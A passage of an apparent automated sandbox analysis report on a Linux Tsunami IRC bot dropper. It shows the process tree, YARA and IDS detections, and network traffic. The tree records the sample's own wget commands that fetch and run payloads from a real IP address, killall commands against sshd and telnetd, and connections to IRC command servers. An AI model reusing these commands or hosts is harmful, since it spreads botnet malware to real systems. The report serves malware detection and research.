        • irq1 New Fork (PID: 7383, Parent: 6469)
        • sh (PID: 7383, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service sshd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 7399, Parent: 7383)
          • service (PID: 7399, Parent: 7383, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service sshd stop
            • service New Fork (PID: 7401, Parent: 7399)
            • basename (PID: 7401, Parent: 7399, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7460, Parent: 7399)
            • basename (PID: 7460, Parent: 7399, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7465, Parent: 7399)
            • systemctl (PID: 7465, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 7561, Parent: 7399)
              • service New Fork (PID: 7566, Parent: 7561)
              • systemctl (PID: 7566, Parent: 7561, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 7567, Parent: 7561)
              • sed (PID: 7567, Parent: 7561, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 7625, Parent: 7399)
            • systemctl (PID: 7625, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 7652, Parent: 7399)
            • systemctl (PID: 7652, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 7663, Parent: 7399)
            • systemctl (PID: 7663, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 7705, Parent: 7399)
            • systemctl (PID: 7705, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 7714, Parent: 7399)
            • systemctl (PID: 7714, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 7744, Parent: 7399)
            • systemctl (PID: 7744, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 7787, Parent: 7399)
            • systemctl (PID: 7787, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 7792, Parent: 7399)
            • systemctl (PID: 7792, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 7825, Parent: 7399)
            • systemctl (PID: 7825, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 7860, Parent: 7399)
            • systemctl (PID: 7860, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 7887, Parent: 7399)
            • systemctl (PID: 7887, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 7906, Parent: 7399)
            • systemctl (PID: 7906, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 7933, Parent: 7399)
            • systemctl (PID: 7933, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 7960, Parent: 7399)
            • systemctl (PID: 7960, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 7987, Parent: 7399)
            • systemctl (PID: 7987, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 8007, Parent: 7399)
            • systemctl (PID: 8007, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 8048, Parent: 7399)
            • systemctl (PID: 8048, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 8067, Parent: 7399)
            • systemctl (PID: 8067, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 8095, Parent: 7399)
            • systemctl (PID: 8095, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 8133, Parent: 7399)
            • systemctl (PID: 8133, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 8160, Parent: 7399)
            • systemctl (PID: 8160, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 8187, Parent: 7399)
            • systemctl (PID: 8187, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 8219, Parent: 7399)
            • systemctl (PID: 8219, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 8257, Parent: 7399)
            • systemctl (PID: 8257, Parent: 7399, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 7399, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop sshd.service
        • irq1 New Fork (PID: 7403, Parent: 6469)
        • sh (PID: 7403, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 telnetd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7455, Parent: 7403)
          • killall (PID: 7455, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd
        • irq1 New Fork (PID: 7457, Parent: 6469)
        • sh (PID: 7457, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7464, Parent: 7457)
          • killall (PID: 7464, Parent: 7457, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 utelnetd
        • irq1 New Fork (PID: 7474, Parent: 6469)
        • sh (PID: 7474, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 dropbear > /dev/null 2>&1 &"
          • sh New Fork (PID: 7477, Parent: 7474)
          • killall (PID: 7477, Parent: 7474, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 dropbear
        • irq1 New Fork (PID: 7479, Parent: 6469)
        • sh (PID: 7479, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 sshd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7532, Parent: 7479)
          • killall (PID: 7532, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 sshd
        • irq1 New Fork (PID: 7533, Parent: 6469)
        • sh (PID: 7533, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 lighttpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7547, Parent: 7533)
          • killall (PID: 7547, Parent: 7533, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 lighttpd
        • irq1 New Fork (PID: 8393, Parent: 6469)
          • irq1 New Fork (PID: 8395, Parent: 8393)
          • sh (PID: 8395, Parent: 8393, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear ; rm -rf /var/run/tt* /tmp/tt* )>/dev/null 2>&1 & "
            • sh New Fork (PID: 8397, Parent: 8395)
              • sh New Fork (PID: 8398, Parent: 8397)
              • cat (PID: 8398, Parent: 8397, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/dropbear.pid
              • sh New Fork (PID: 8402, Parent: 8397)
              • cat (PID: 8402, Parent: 8397, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/sshd.pid
              • sh New Fork (PID: 8424, Parent: 8397)
              • killall (PID: 8424, Parent: 8397, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear
            • rm (PID: 8397, Parent: 3310, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/tty0 /var/run/tty1 /var/run/tty2 /var/run/tty3 /var/run/tty4 /var/run/tty5 /var/run/tty6 /tmp/tt*
        • irq1 New Fork (PID: 9008, Parent: 6469)
          • irq1 New Fork (PID: 9010, Parent: 9008)
          • irq1 New Fork (PID: 9012, Parent: 9008)
          • irq1 New Fork (PID: 9013, Parent: 9008)
          • irq1 New Fork (PID: 9015, Parent: 9008)
          • irq1 New Fork (PID: 9018, Parent: 9008)
          • irq1 New Fork (PID: 9019, Parent: 9008)
          • irq1 New Fork (PID: 9022, Parent: 9008)
          • irq1 New Fork (PID: 9023, Parent: 9008)
          • irq1 New Fork (PID: 9026, Parent: 9008)
          • irq1 New Fork (PID: 9028, Parent: 9008)
          • irq1 New Fork (PID: 9030, Parent: 9008)
          • irq1 New Fork (PID: 9032, Parent: 9008)
          • irq1 New Fork (PID: 9034, Parent: 9008)
          • irq1 New Fork (PID: 9035, Parent: 9008)
          • irq1 New Fork (PID: 9038, Parent: 9008)
          • irq1 New Fork (PID: 9040, Parent: 9008)
          • irq1 New Fork (PID: 9041, Parent: 9008)
          • irq1 New Fork (PID: 9044, Parent: 9008)
          • irq1 New Fork (PID: 9045, Parent: 9008)
          • irq1 New Fork (PID: 9048, Parent: 9008)
          • irq1 New Fork (PID: 9050, Parent: 9008)
          • irq1 New Fork (PID: 9051, Parent: 9008)
          • irq1 New Fork (PID: 9055, Parent: 9008)
          • irq1 New Fork (PID: 9057, Parent: 9008)
          • irq1 New Fork (PID: 9059, Parent: 9008)
          • irq1 New Fork (PID: 9061, Parent: 9008)
          • irq1 New Fork (PID: 9063, Parent: 9008)
          • irq1 New Fork (PID: 9064, Parent: 9008)
          • irq1 New Fork (PID: 9065, Parent: 9008)
          • irq1 New Fork (PID: 9066, Parent: 9008)
          • irq1 New Fork (PID: 9067, Parent: 9008)
          • irq1 New Fork (PID: 9068, Parent: 9008)
          • irq1 New Fork (PID: 9069, Parent: 9008)
          • irq1 New Fork (PID: 9077, Parent: 9008)
          • irq1 New Fork (PID: 9078, Parent: 9008)
          • irq1 New Fork (PID: 9079, Parent: 9008)
          • irq1 New Fork (PID: 9082, Parent: 9008)
          • irq1 New Fork (PID: 9083, Parent: 9008)
          • irq1 New Fork (PID: 9084, Parent: 9008)
          • irq1 New Fork (PID: 9088, Parent: 9008)
          • irq1 New Fork (PID: 9089, Parent: 9008)
          • irq1 New Fork (PID: 9090, Parent: 9008)
          • irq1 New Fork (PID: 9091, Parent: 9008)
          • irq1 New Fork (PID: 9097, Parent: 9008)
          • irq1 New Fork (PID: 9098, Parent: 9008)
          • irq1 New Fork (PID: 9099, Parent: 9008)
          • irq1 New Fork (PID: 9102, Parent: 9008)
          • irq1 New Fork (PID: 9103, Parent: 9008)
          • irq1 New Fork (PID: 9104, Parent: 9008)
          • irq1 New Fork (PID: 9105, Parent: 9008)
          • irq1 New Fork (PID: 9106, Parent: 9008)
          • irq1 New Fork (PID: 9107, Parent: 9008)
          • irq1 New Fork (PID: 9108, Parent: 9008)
          • irq1 New Fork (PID: 9117, Parent: 9008)
          • irq1 New Fork (PID: 9118, Parent: 9008)
          • irq1 New Fork (PID: 9119, Parent: 9008)
          • irq1 New Fork (PID: 9120, Parent: 9008)
          • irq1 New Fork (PID: 9121, Parent: 9008)
          • irq1 New Fork (PID: 9122, Parent: 9008)
          • irq1 New Fork (PID: 9123, Parent: 9008)
          • irq1 New Fork (PID: 9124, Parent: 9008)
          • irq1 New Fork (PID: 9125, Parent: 9008)
          • irq1 New Fork (PID: 9135, Parent: 9008)
          • irq1 New Fork (PID: 9136, Parent: 9008)
          • irq1 New Fork (PID: 9137, Parent: 9008)
          • irq1 New Fork (PID: 9138, Parent: 9008)
          • irq1 New Fork (PID: 9143, Parent: 9008)
          • irq1 New Fork (PID: 9144, Parent: 9008)
          • irq1 New Fork (PID: 9145, Parent: 9008)
          • irq1 New Fork (PID: 9146, Parent: 9008)
          • irq1 New Fork (PID: 9147, Parent: 9008)
          • irq1 New Fork (PID: 9148, Parent: 9008)
          • irq1 New Fork (PID: 9155, Parent: 9008)
          • irq1 New Fork (PID: 9156, Parent: 9008)
          • irq1 New Fork (PID: 9157, Parent: 9008)
          • irq1 New Fork (PID: 9158, Parent: 9008)
          • irq1 New Fork (PID: 9159, Parent: 9008)
          • irq1 New Fork (PID: 9160, Parent: 9008)
          • irq1 New Fork (PID: 9161, Parent: 9008)
          • irq1 New Fork (PID: 9162, Parent: 9008)
          • irq1 New Fork (PID: 9163, Parent: 9008)
          • irq1 New Fork (PID: 9164, Parent: 9008)
          • irq1 New Fork (PID: 9176, Parent: 9008)
          • irq1 New Fork (PID: 9177, Parent: 9008)
          • irq1 New Fork (PID: 9178, Parent: 9008)
          • irq1 New Fork (PID: 9179, Parent: 9008)
          • irq1 New Fork (PID: 9180, Parent: 9008)
          • irq1 New Fork (PID: 9181, Parent: 9008)
          • irq1 New Fork (PID: 9182, Parent: 9008)
          • irq1 New Fork (PID: 9183, Parent: 9008)
          • irq1 New Fork (PID: 9195, Parent: 9008)
          • irq1 New Fork (PID: 9197, Parent: 9008)
          • irq1 New Fork (PID: 9198, Parent: 9008)
          • irq1 New Fork (PID: 9199, Parent: 9008)
          • irq1 New Fork (PID: 9200, Parent: 9008)
          • irq1 New Fork (PID: 9201, Parent: 9008)
          • irq1 New Fork (PID: 9202, Parent: 9008)
          • irq1 New Fork (PID: 9203, Parent: 9008)
          • irq1 New Fork (PID: 9204, Parent: 9008)
          • irq1 New Fork (PID: 9205, Parent: 9008)
          • irq1 New Fork (PID: 9206, Parent: 9008)
          • irq1 New Fork (PID: 9207, Parent: 9008)
          • irq1 New Fork (PID: 9208, Parent: 9008)
          • irq1 New Fork (PID: 9209, Parent: 9008)
          • irq1 New Fork (PID: 9239, Parent: 9008)
          • irq1 New Fork (PID: 9240, Parent: 9008)
          • irq1 New Fork (PID: 9241, Parent: 9008)
          • irq1 New Fork (PID: 9242, Parent: 9008)
          • irq1 New Fork (PID: 9243, Parent: 9008)
          • irq1 New Fork (PID: 9244, Parent: 9008)
          • irq1 New Fork (PID: 9245, Parent: 9008)
          • irq1 New Fork (PID: 9246, Parent: 9008)
          • irq1 New Fork (PID: 9247, Parent: 9008)
          • irq1 New Fork (PID: 9248, Parent: 9008)
          • irq1 New Fork (PID: 9249, Parent: 9008)
          • irq1 New Fork (PID: 9250, Parent: 9008)
          • irq1 New Fork (PID: 9269, Parent: 9008)
          • irq1 New Fork (PID: 9270, Parent: 9008)
          • irq1 New Fork (PID: 9271, Parent: 9008)
          • irq1 New Fork (PID: 9277, Parent: 9008)
          • irq1 New Fork (PID: 9278, Parent: 9008)
          • irq1 New Fork (PID: 9279, Parent: 9008)
          • irq1 New Fork (PID: 9280, Parent: 9008)
          • irq1 New Fork (PID: 9285, Parent: 9008)
          • irq1 New Fork (PID: 9286, Parent: 9008)
          • irq1 New Fork (PID: 9287, Parent: 9008)
          • irq1 New Fork (PID: 9288, Parent: 9008)
          • irq1 New Fork (PID: 9289, Parent: 9008)
          • irq1 New Fork (PID: 9290, Parent: 9008)
          • irq1 New Fork (PID: 9291, Parent: 9008)
          • irq1 New Fork (PID: 9292, Parent: 9008)
          • irq1 New Fork (PID: 9303, Parent: 9008)
          • irq1 New Fork (PID: 9309, Parent: 9008)
          • irq1 New Fork (PID: 9318, Parent: 9008)
          • irq1 New Fork (PID: 9319, Parent: 9008)
          • irq1 New Fork (PID: 9320, Parent: 9008)
          • irq1 New Fork (PID: 9321, Parent: 9008)
          • irq1 New Fork (PID: 9322, Parent: 9008)
          • irq1 New Fork (PID: 9323, Parent: 9008)
          • irq1 New Fork (PID: 9324, Parent: 9008)
          • irq1 New Fork (PID: 9325, Parent: 9008)
          • irq1 New Fork (PID: 9326, Parent: 9008)
          • irq1 New Fork (PID: 9327, Parent: 9008)
          • irq1 New Fork (PID: 9328, Parent: 9008)
          • irq1 New Fork (PID: 9329, Parent: 9008)
          • irq1 New Fork (PID: 9330, Parent: 9008)
          • irq1 New Fork (PID: 9349, Parent: 9008)
          • irq1 New Fork (PID: 9350, Parent: 9008)
          • irq1 New Fork (PID: 9352, Parent: 9008)
          • irq1 New Fork (PID: 9353, Parent: 9008)
          • irq1 New Fork (PID: 9367, Parent: 9008)
          • irq1 New Fork (PID: 9369, Parent: 9008)
          • irq1 New Fork (PID: 9398, Parent: 9008)
          • irq1 New Fork (PID: 9399, Parent: 9008)
          • irq1 New Fork (PID: 9400, Parent: 9008)
          • irq1 New Fork (PID: 9401, Parent: 9008)
          • irq1 New Fork (PID: 9402, Parent: 9008)
          • irq1 New Fork (PID: 9403, Parent: 9008)
          • irq1 New Fork (PID: 9404, Parent: 9008)
          • irq1 New Fork (PID: 9405, Parent: 9008)
          • irq1 New Fork (PID: 9406, Parent: 9008)
          • irq1 New Fork (PID: 9407, Parent: 9008)
          • irq1 New Fork (PID: 9408, Parent: 9008)
          • irq1 New Fork (PID: 9409, Parent: 9008)
          • irq1 New Fork (PID: 9437, Parent: 9008)
          • irq1 New Fork (PID: 9438, Parent: 9008)
          • irq1 New Fork (PID: 9439, Parent: 9008)
          • irq1 New Fork (PID: 9440, Parent: 9008)
          • irq1 New Fork (PID: 9441, Parent: 9008)
          • irq1 New Fork (PID: 9442, Parent: 9008)
          • irq1 New Fork (PID: 9455, Parent: 9008)
          • irq1 New Fork (PID: 9456, Parent: 9008)
          • irq1 New Fork (PID: 9457, Parent: 9008)
          • irq1 New Fork (PID: 9458, Parent: 9008)
          • irq1 New Fork (PID: 9459, Parent: 9008)
          • irq1 New Fork (PID: 9460, Parent: 9008)
          • irq1 New Fork (PID: 9461, Parent: 9008)
          • irq1 New Fork (PID: 9462, Parent: 9008)
          • irq1 New Fork (PID: 9463, Parent: 9008)
          • irq1 New Fork (PID: 9498, Parent: 9008)
          • irq1 New Fork (PID: 9499, Parent: 9008)
          • irq1 New Fork (PID: 9500, Parent: 9008)
          • irq1 New Fork (PID: 9517, Parent: 9008)
          • irq1 New Fork (PID: 9518, Parent: 9008)
          • irq1 New Fork (PID: 9519, Parent: 9008)
          • irq1 New Fork (PID: 9527, Parent: 9008)
          • irq1 New Fork (PID: 9534, Parent: 9008)
          • irq1 New Fork (PID: 9537, Parent: 9008)
          • irq1 New Fork (PID: 9538, Parent: 9008)
          • irq1 New Fork (PID: 9539, Parent: 9008)
          • irq1 New Fork (PID: 9540, Parent: 9008)
          • irq1 New Fork (PID: 9541, Parent: 9008)
          • irq1 New Fork (PID: 9542, Parent: 9008)
          • irq1 New Fork (PID: 9543, Parent: 9008)
          • irq1 New Fork (PID: 9544, Parent: 9008)
          • irq1 New Fork (PID: 9545, Parent: 9008)
          • irq1 New Fork (PID: 9546, Parent: 9008)
          • irq1 New Fork (PID: 9547, Parent: 9008)
          • irq1 New Fork (PID: 9548, Parent: 9008)
          • irq1 New Fork (PID: 9574, Parent: 9008)
          • irq1 New Fork (PID: 9585, Parent: 9008)
          • irq1 New Fork (PID: 9586, Parent: 9008)
          • irq1 New Fork (PID: 9587, Parent: 9008)
          • irq1 New Fork (PID: 9588, Parent: 9008)
          • irq1 New Fork (PID: 9589, Parent: 9008)
          • irq1 New Fork (PID: 9590, Parent: 9008)
          • irq1 New Fork (PID: 9591, Parent: 9008)
          • irq1 New Fork (PID: 9592, Parent: 9008)
          • irq1 New Fork (PID: 9593, Parent: 9008)
          • irq1 New Fork (PID: 9628, Parent: 9008)
          • irq1 New Fork (PID: 9629, Parent: 9008)
          • irq1 New Fork (PID: 9660, Parent: 9008)
          • irq1 New Fork (PID: 9692, Parent: 9008)
          • irq1 New Fork (PID: 9700, Parent: 9008)
          • irq1 New Fork (PID: 9721, Parent: 9008)
          • irq1 New Fork (PID: 9751, Parent: 9008)
    • sh New Fork (PID: 5876, Parent: 4579)
    • wget (PID: 5876, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/irq2 -O irq2
    • sh New Fork (PID: 6194, Parent: 4579)
    • chmod (PID: 6194, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x irq2
    • sh New Fork (PID: 6195, Parent: 4579)
    • chmod (PID: 6195, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 irq2
    • sh New Fork (PID: 6198, Parent: 4579)
    • irq2 (PID: 6198, Parent: 4579, MD5: unknown) Arguments: /usr/bin/qemu-mipsel ./irq2
    • sh New Fork (PID: 6199, Parent: 4579)
    • wget (PID: 6199, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/pty -O /var/tmp/pty
    • sh New Fork (PID: 6275, Parent: 4579)
    • chmod (PID: 6275, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/tmp/pty
    • sh New Fork (PID: 6280, Parent: 4579)
    • chmod (PID: 6280, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/tmp/pty
    • sh New Fork (PID: 6287, Parent: 4579)
    • pty (PID: 6287, Parent: 4579, MD5: 05e1c4a7333bfbd41d109ffc2f70a52a) Arguments: /var/tmp/pty
      • pty New Fork (PID: 6311, Parent: 6287)
    • sh New Fork (PID: 6288, Parent: 4579)
    • wget (PID: 6288, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/pty -O /var/run/pty
    • sh New Fork (PID: 6450, Parent: 4579)
    • chmod (PID: 6450, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/pty
    • sh New Fork (PID: 6456, Parent: 4579)
    • chmod (PID: 6456, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/pty
    • sh New Fork (PID: 6462, Parent: 4579)
    • sh New Fork (PID: 6463, Parent: 4579)
    • rm (PID: 6463, Parent: 4579, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/1sh
  • systemd New Fork (PID: 6356, Parent: 1)
  • sshd (PID: 6356, Parent: 1, MD5: 661b2a2da3b6c7d7ef41d0b9da1caa3b) Arguments: /usr/sbin/sshd -D
  • upstart New Fork (PID: 8551, Parent: 3310)
  • sh (PID: 8551, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 8565, Parent: 8551)
    • date (PID: 8565, Parent: 8551, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 8580, Parent: 8551)
    • apport-checkreports (PID: 8580, Parent: 8551, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 8934, Parent: 3310)
  • sh (PID: 8934, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 8938, Parent: 8934)
    • date (PID: 8938, Parent: 8934, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 8960, Parent: 8934)
    • apport-gtk (PID: 8960, Parent: 8934, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 8981, Parent: 3310)
  • sh (PID: 8981, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 8982, Parent: 8981)
    • date (PID: 8982, Parent: 8981, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 8997, Parent: 8981)
    • apport-gtk (PID: 8997, Parent: 8981, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
8337.1.0000000008048000.000000000805c000.r-x.sdmpJoeSecurity_TsunamiYara detected TsunamiJoe Security
    8337.1.0000000008048000.000000000805c000.r-x.sdmpLinuxTsunamiunknownunknown
    • 0xdda4:$c: NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
    6287.1.0000000008048000.000000000805c000.r-x.sdmpJoeSecurity_TsunamiYara detected TsunamiJoe Security
      6287.1.0000000008048000.000000000805c000.r-x.sdmpLinuxTsunamiunknownunknown
      • 0xdda4:$c: NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
      4831.1.0000000008048000.000000000805c000.r-x.sdmpJoeSecurity_TsunamiYara detected TsunamiJoe Security
        Click to see the 3 entries

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Multi AV Scanner detection for submitted fileShow sources
        Source: 1.shVirustotal: Detection: 16%Perma Link
        Source: 1.shReversingLabs: Detection: 24%
        Machine Learning detection for dropped fileShow sources
        Source: /var/tmp/ptyJoe Sandbox ML: detected
        Source: /run/ptyJoe Sandbox ML: detected
        Source: /tmp/ptyJoe Sandbox ML: detected

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2000345 ET TROJAN IRC Nick change on non-standard port 192.168.2.20:34156 -> 83.69.77.2:8080
        Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.227.124.42: -> 192.168.2.20:
        Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.226.157.40: -> 192.168.2.20:
        Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.47.24.237: -> 192.168.2.20:
        Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 213.248.72.10: -> 192.168.2.20:
        Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.224.191.8: -> 192.168.2.20:
        Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.84.231.63: -> 192.168.2.20:
        Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.94.125.110: -> 192.168.2.20:
        Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 193.110.224.22: -> 192.168.2.20:
        Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.143.93.162: -> 192.168.2.20:
        Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.153.30.139: -> 192.168.2.20:
        Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.251.87.111: -> 192.168.2.20:
        Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.91.105.7: -> 192.168.2.20:
        Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.251.5.203: -> 192.168.2.20:
        Uses IRC for communication with a C&CShow sources
        Source: unknownIRC traffic detected: 192.168.2.20:34156 -> 83.69.77.2:8080 NICK x86|x|0|744924|ubuntu-a USER x00 localhost localhost :2021g
        Uses known network protocols on non-standard portsShow sources
        Source: unknownNetwork traffic detected: IRC traffic on port 34156 -> 8080
        Source: unknownNetwork traffic detected: IRC traffic on port 34156 -> 8080
        Source: unknownNetwork traffic detected: IRC traffic on port 34156 -> 8080
        Source: unknownNetwork traffic detected: IRC traffic on port 57642 -> 8080
        Source: unknownNetwork traffic detected: IRC traffic on port 57642 -> 8080
        Source: unknownNetwork traffic detected: IRC traffic on port 53028 -> 8080
        Source: unknownNetwork traffic detected: IRC traffic on port 53028 -> 8080
        Source: global trafficTCP traffic: 192.168.2.20:58902 -> 211.103.199.94:8080
        Source: global trafficTCP traffic: 192.168.2.20:34156 -> 83.69.77.2:8080
        Source: global trafficTCP traffic: 192.168.2.20:57642 -> 191.98.172.42:8080
        Source: global trafficTCP traffic: 192.168.2.20:53028 -> 195.70.197.29:8080
        Source: /bin/sh (PID: 4581)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty0 -O /var/run/tty0Jump to behavior
        Source: /bin/sh (PID: 4608)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty1 -O /var/run/tty1Jump to behavior
